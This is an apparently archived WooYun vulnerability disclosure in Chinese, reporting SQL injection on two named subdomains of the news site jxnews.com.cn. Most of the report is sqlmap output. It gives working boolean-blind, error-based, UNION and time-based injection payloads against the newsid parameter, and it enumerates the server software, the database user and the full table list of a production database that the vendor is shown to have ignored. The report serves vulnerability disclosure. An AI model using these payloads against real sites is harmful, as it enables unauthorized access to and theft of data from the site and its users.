漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-045726
漏洞标题:敏感信息泄露#大江网分站SQL注入漏洞
相关厂商:jxnews.com.cn
漏洞作者: adm1n
提交时间:2013-12-12 14:58
修复时间:2013-12-17 14:59
公开时间:2013-12-17 14:59
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-12-12: 细节已通知厂商并且等待厂商处理中
2013-12-17: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
大江网分站SQL注入漏洞
详细说明:
1.http://jbqgb.jxnews.com.cn/article.php?newsid=1883
2.http://dev.jxnews.com.cn/yw/ms/view.php?id=11970
漏洞证明:
Place: GET
Parameter: newsid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newsid=1883 AND 4350=4350
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: newsid=1883 AND (SELECT 8006 FROM(SELECT COUNT(*),CONCAT(0x71757562
71,(SELECT (CASE WHEN (8006=8006) THEN 1 ELSE 0 END)),0x7175696971,FLOOR(RAND(0)
*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 35 columns
Payload: newsid=-6839 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(
0x7175756271,0x5446514b6f765145676b,0x7175696971),NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: newsid=1883 AND SLEEP(5)
---
[13:57:06] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.3, PHP 5.3.6
back-end DBMS: MySQL 5.0
current user: 'jxrbcom@localhost'
Database: test
[1 table]
+-------------------------------+
| test |
+-------------------------------+
Database: jxrbcom
[90 tables]
+-------------------------------+
| acl |
| acl_sections |
| acl_seq |
| aco |
| aco_map |
| aco_sections |
| aco_sections_seq |
| aco_seq |
| aro |
| aro_groups |
| aro_groups_id_seq |
| aro_groups_map |
| aro_map |
| aro_sections |
| aro_sections_seq |
| aro_seq |
| axo |
| axo_groups |
| axo_groups_map |
| axo_map |
| axo_sections |
| axo_sections_seq |
| axo_seq |
| groups_aro_map |
| groups_axo_map |
| koobi4_active |
| koobi4_adminlogs |
| koobi4_affiliates |
| koobi4_areas |
| koobi4_articlecat |
| koobi4_articlecomments |
| koobi4_articles |
| koobi4_autowords |
| koobi4_container |
| koobi4_downloadcat |
| koobi4_downloadcat_restricted |
| koobi4_downloadcomments |
| koobi4_downloads |
| koobi4_f_allowed_files |
| koobi4_f_attachment |
| koobi4_f_category |
| koobi4_f_forum |
| koobi4_f_mods |
| koobi4_f_permissions |
| koobi4_f_post |
| koobi4_f_rank |
| koobi4_f_rating |
| koobi4_f_topic |
| koobi4_faq |
| koobi4_gallery |
| koobi4_gallery_items |
| koobi4_genres |
| koobi4_guestbook |
| koobi4_guestbook_settings |
| koobi4_ignore |
| koobi4_languages |
| koobi4_languages_admin |
| koobi4_linkcat |
| koobi4_linkcomments |
| koobi4_links |
| koobi4_manufacturer |
| koobi4_navi |
| koobi4_news |
| koobi4_newscat |
| koobi4_newscomments |
| koobi4_newsletter |
| koobi4_newsletter_abos |
| koobi4_newsletter_archiv |
| koobi4_permissions |
| koobi4_platform |
| koobi4_pn |
| koobi4_poll |
| koobi4_poll_item |
| koobi4_pollcomments |
| koobi4_posticons |
| koobi4_products |
| koobi4_referer |
| koobi4_securecode |
| koobi4_sessions |
| koobi4_settings |
| koobi4_sitestats |
| koobi4_smileys |
| koobi4_speedbar |
| koobi4_static |
| koobi4_static_categ |
| koobi4_user |
| koobi4_userfields |
| koobi4_usergroup |
| koobi4_useronline |
| phpgacl |
+-------------------------------+
Database: information_schema
[26 tables]
+-------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+-------------------------------+
修复方案:
过滤
版权声明:转载请注明来源 adm1n@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2013-12-17 14:59
厂商回复:
最新状态:
暂无